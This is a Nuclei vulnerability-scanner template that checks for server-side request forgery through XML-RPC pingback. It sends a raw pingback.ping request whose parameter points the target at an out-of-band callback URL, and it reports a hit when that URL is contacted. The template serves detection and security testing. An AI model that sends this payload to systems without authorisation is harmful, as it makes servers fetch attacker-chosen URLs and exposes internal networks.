nuclei-templates/http/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml

id: xmlrpc-pingback-ssrf

info:
  name: XMLRPC Pingback SSRF
  author: geeknik
  severity: high
  reference:
    - https://hackerone.com/reports/406387
  metadata:
    max-request: 1
  tags: xmlrpc,hackerone,ssrf,generic

http:
  - raw:
      - |
        POST /xmlrpc/pingback HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

        <?xml version="1.0" encoding="UTF-8"?>
        <methodCall>
        <methodName>pingback.ping</methodName>
        <params>
        <param>
        <value>http://{{interactsh-url}}</value>
        </param>
        </params>
        </methodCall>        

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

# digest: 490a00463044022054f09bba29b03fecfb48e1c7e01ea52ff60cce13d6a2e9c4ceee9b560f60497802200ef0fccebc5503c1da59a5cfda01788491c5da4155f3b6bbb6545b280ecdd20b:922c64590222798bb761d5b6d8e72950